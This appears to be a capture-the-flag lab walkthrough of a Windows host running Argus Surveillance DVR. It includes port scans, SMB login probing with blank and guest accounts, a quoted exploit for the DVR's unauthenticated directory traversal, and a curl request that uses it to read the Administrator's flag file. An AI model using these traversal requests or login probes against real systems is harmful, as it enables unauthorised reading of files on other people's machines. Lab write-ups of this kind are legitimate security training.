
# NMAP

## initial scan

```
┌──(tyler㉿kali)-[~/Documents/Proving Grounds]  
└─$ sudo nmap -v -p- 192.168.180.179          
[sudo] password for tyler:    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 19:08 CEST  
Initiating Ping Scan at 19:08  
Scanning 192.168.180.179 [4 ports]  
Completed Ping Scan at 19:08, 0.07s elapsed (1 total hosts)  
Initiating Parallel DNS resolution of 1 host. at 19:08  
Completed Parallel DNS resolution of 1 host. at 19:08, 0.11s elapsed  
Initiating SYN Stealth Scan at 19:08  
Scanning 192.168.180.179 [65535 ports]  
Discovered open port 445/tcp on 192.168.180.179  
Discovered open port 139/tcp on 192.168.180.179  
Discovered open port 8080/tcp on 192.168.180.179  
Discovered open port 135/tcp on 192.168.180.179  
Discovered open port 22/tcp on 192.168.180.179  
Discovered open port 49664/tcp on 192.168.180.179  
Discovered open port 49668/tcp on 192.168.180.179  
Discovered open port 5040/tcp on 192.168.180.179  
Discovered open port 7680/tcp on 192.168.180.179  
Discovered open port 49667/tcp on 192.168.180.179  
Discovered open port 49666/tcp on 192.168.180.179  
Discovered open port 49665/tcp on 192.168.180.179  
Discovered open port 49669/tcp on 192.168.180.179  
Completed SYN Stealth Scan at 19:09, 28.55s elapsed (65535 total ports)  
Nmap scan report for 192.168.180.179  
Host is up (0.034s latency).  
Not shown: 65522 closed tcp ports (reset)  
PORT      STATE SERVICE  
22/tcp    open  ssh  
135/tcp   open  msrpc  
139/tcp   open  netbios-ssn  
445/tcp   open  microsoft-ds  
5040/tcp  open  unknown  
7680/tcp  open  pando-pub  
8080/tcp  open  http-proxy  
49664/tcp open  unknown  
49665/tcp open  unknown  
49666/tcp open  unknown  
49667/tcp open  unknown  
49668/tcp open  unknown  
49669/tcp open  unknown  
  
Read data files from: /usr/bin/../share/nmap  
Nmap done: 1 IP address (1 host up) scanned in 28.86 seconds  
          Raw packets sent: 65664 (2.889MB) | Rcvd: 65536 (2.621MB)
```

## thorough scan

```
┌──(tyler㉿kali)-[~/Documents/Proving Grounds]  
└─$ sudo nmap -A -p 22,135,139,445,5040,7680,8080,49664,49665,49666,49667,49668,49669 192.168.180.179  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 19:10 CEST  
Nmap scan report for 192.168.180.179  
Host is up (0.030s latency).  
  
PORT      STATE SERVICE       VERSION  
22/tcp    open  ssh           Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)  
| ssh-hostkey:    
|   3072 2125f053b4990f34de2dcabc5dfe20ce (RSA)  
|_  384 e796f36ad892075abf3706860a317319 (ECDSA)  
135/tcp   open  msrpc         Microsoft Windows RPC  
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn  
445/tcp   open  microsoft-ds?  
5040/tcp  open  unknown  
7680/tcp  open  pando-pub?  
8080/tcp  open  http-proxy  
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]  
| fingerprint-strings:    
|   GetRequest, HTTPOptions:    
|     HTTP/1.1 200 OK  
|     Connection: Keep-Alive  
|     Keep-Alive: timeout=15, max=4  
|     Content-Type: text/html  
|     Content-Length: 985  
|     <HTML>  
|     <HEAD>  
|     <TITLE>  
|     Argus Surveillance DVR  
|     </TITLE>  
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">  
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">  
|     <frameset frameborder="no" border="0" rows="75,*,88">  
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0">    
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">  
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0">    
|     <noframes>  
|     <p>This page uses frames, but your browser doesn't support them.</p>  
|_    </noframes>  
|_http-title: Argus Surveillance DVR  
49664/tcp open  msrpc         Microsoft Windows RPC  
49665/tcp open  msrpc         Microsoft Windows RPC  
49666/tcp open  msrpc         Microsoft Windows RPC  
49667/tcp open  msrpc         Microsoft Windows RPC  
49668/tcp open  msrpc         Microsoft Windows RPC  
49669/tcp open  msrpc         Microsoft Windows RPC  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-servi  
ce :  
SF-Port8080-TCP:V=7.93%I=7%D=6/6%Time=647F6887%P=x86_64-pc-linux-gnu%r(Get  
SF:Request,451,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20Keep-Alive\r\nKee  
SF:p-Alive:\x20timeout=15,\x20max=4\r\nContent-Type:\x20text/html\r\nConte  
SF:nt-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r\n<TITLE>\r\nArgus\x20Survei  
SF:llance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20http-equiv=\"Content-Type\"\x  
SF:20content=\"text/html;\x20charset=ISO-8859-1\">\r\n<meta\x20name=\"GENE  
SF:RATOR\"\x20content=\"Actual\x20Drawing\x206\.0\x20\(http://www\.pysoft\  
SF:.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<frameset\x20frameborder=\"no\"\x20b  
SF:order=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x20<frame\x20name=\"Top\"\x20  
SF:frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasTop  
SF:Frame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r\n\x  
SF:20\x20<frame\x20name=\"ActiveXFrame\"\x20frameborder=\"0\"\x20scrolling  
SF:=\"auto\"\x20noresize\x20src=\"ActiveXIFrame\.html\"\x20marginwidth=\"0  
SF:\"\x20marginheight=\"0\">\r\n\x20\x20<frame\x20name=\"CamerasTable\"\x2  
SF:0frameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"CamerasBo  
SF:ttomFrame\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\x20\x20\r  
SF:\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>This\x20page\x20uses\x20fram  
SF:es,\x20but\x20your\x20browser\x20doesn't\x20support\x20them\.</p>\r\n\x  
SF:20\x20</noframes>\r")%r(HTTPOptions,451,"HTTP/1\.1\x20200\x20OK\r\nConn  
SF:ection:\x20Keep-Alive\r\nKeep-Alive:\x20timeout=15,\x20max=4\r\nContent  
SF:-Type:\x20text/html\r\nContent-Length:\x20985\r\n\r\n<HTML>\r\n<HEAD>\r  
SF:\n<TITLE>\r\nArgus\x20Surveillance\x20DVR\r\n</TITLE>\r\n\r\n<meta\x20h  
SF:ttp-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=ISO-8859-  
SF:1\">\r\n<meta\x20name=\"GENERATOR\"\x20content=\"Actual\x20Drawing\x206  
SF:\.0\x20\(http://www\.pysoft\.com\)\x20\[PYSOFTWARE\]\">\r\n\r\n<framese  
SF:t\x20frameborder=\"no\"\x20border=\"0\"\x20rows=\"75,\*,88\">\r\n\x20\x  
SF:20<frame\x20name=\"Top\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x20  
SF:noresize\x20src=\"CamerasTopFrame\.html\"\x20marginwidth=\"0\"\x20margi  
SF:nheight=\"0\">\x20\x20\r\n\x20\x20<frame\x20name=\"ActiveXFrame\"\x20fr  
SF:ameborder=\"0\"\x20scrolling=\"auto\"\x20noresize\x20src=\"ActiveXIFram  
SF:e\.html\"\x20marginwidth=\"0\"\x20marginheight=\"0\">\r\n\x20\x20<frame  
SF:\x20name=\"CamerasTable\"\x20frameborder=\"0\"\x20scrolling=\"auto\"\x2  
SF:0noresize\x20src=\"CamerasBottomFrame\.html\"\x20marginwidth=\"0\"\x20m  
SF:arginheight=\"0\">\x20\x20\r\n\x20\x20<noframes>\r\n\x20\x20\x20\x20<p>  
SF:This\x20page\x20uses\x20frames,\x20but\x20your\x20browser\x20doesn't\x2  
SF:0support\x20them\.</p>\r\n\x20\x20</noframes>\r");  
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
Device type: general purpose  
Running (JUST GUESSING): Microsoft Windows XP|2008|7 (86%)  
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7  
Aggressive OS guesses: Microsoft Windows XP SP3 (86%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows S  
erver 2008 or 2008 Beta 3 (85%)  
No exact OS matches for host (test conditions non-ideal).  
Network Distance: 4 hops  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows  
  
Host script results:  
| smb2-security-mode:    
|   311:    
|_    Message signing enabled but not required  
| smb2-time:    
|   date: 2023-06-06T17:13:08  
|_  start_date: N/A  
  
TRACEROUTE (using port 135/tcp)  
HOP RTT      ADDRESS  
1   26.11 ms 192.168.45.1  
2   26.10 ms 192.168.45.254  
3   26.12 ms 192.168.251.1  
4   26.15 ms 192.168.180.179  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 190.11 seconds
```

# SERVICE VULNERABILITIES

## argus surveillance dvr
```
┌──(tyler㉿kali)-[~/Documents/Proving Grounds/tmp_folder]  
└─$ searchsploit argus     
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------  
Exploit Title   |  Path  
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------  
Argus Surveillance DVR 4.0 - Unquoted Service Path                                | windows/local/50261.txt  
Argus Surveillance DVR 4.0 - Weak Password Encryption                          | windows/local/50130.py  
Argus Surveillance DVR 4.0.0.0 - Directory Traversal                             | windows_x86/webapps/45296.txt  
Argus Surveillance DVR 4.0.0.0 - Privilege Escalation                           | windows_x86/local/45312.c  
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```

```
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal  
# Author: John Page (aka hyp3rlinx)  
# Date: 2018-08-28  
# Vendor: www.argussurveillance.com  
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe  
# CVE: N/A  
  
# Description:  
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,  
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.  
  
# PoC  
  
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&  
USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="  
  
# Result:  
  
; for 16-bit app support  
woafont=dosapp.fon  
EGA80WOA.FON=EGA80WOA.FON  
EGA40WOA.FON=EGA40WOA.FON  
CGA80WOA.FON=CGA80WOA.FON  
CGA40WOA.FON=CGA40WOA.FON  
  
wave=mmdrv.dll  
timer=timer.drv  
  
# https://vimeo.com/287115273  
# Greetz: ***Greetz: indoushka | Eduardo | GGA***
```

# SMB

## no user

```
┌──(tyler㉿kali)-[~/Documents/Proving Grounds/tmp_folder]  
└─$ crackmapexec smb 192.168.180.179 -u '' -p ''           
SMB         192.168.180.179 445    DVR4             [*] Windows 10.0 Build 19041 x64 (name:DVR4) (domain:DVR4) (signing:False) (SMBv1:False)  
SMB         192.168.180.179 445    DVR4             [-] DVR4\: STATUS_ACCESS_DENIED    
                                                                                                                                                                          
┌──(tyler㉿kali)-[~/Documents/Proving Grounds/tmp_folder]  
└─$ crackmapexec smb 192.168.180.179 -u 'guest' -p ''  
SMB         192.168.180.179 445    DVR4             [*] Windows 10.0 Build 19041 x64 (name:DVR4) (domain:DVR4) (signing:False) (SMBv1:False)  
SMB         192.168.180.179 445    DVR4             [-] DVR4\guest: STATUS_ACCOUNT_DISABLED    
                                                                                                                                                                          
┌──(tyler㉿kali)-[~/Documents/Proving Grounds/tmp_folder]  
└─$ crackmapexec smb 192.168.180.179 -u 'tyler' -p ''  
SMB         192.168.180.179 445    DVR4             [*] Windows 10.0 Build 19041 x64 (name:DVR4) (domain:DVR4) (signing:False) (SMBv1:False)  
SMB         192.168.180.179 445    DVR4             [-] DVR4\tyler: STATUS_LOGON_FAILURE
```
# HTTP
## port 8080
### directory traversal

it looks like we can access the administrators directory

```
┌──(tyler㉿kali)-[~/Documents/Proving Grounds/tmp_folder]  
└─$ curl "http://192.168.180.179:8080/WEBACCOUNT.CGI?RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FAdministrator%2F  
Desktop%2Fproof.txt"

dde8ed28735f8f5c1c339cee6c20adfa
```

```
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
```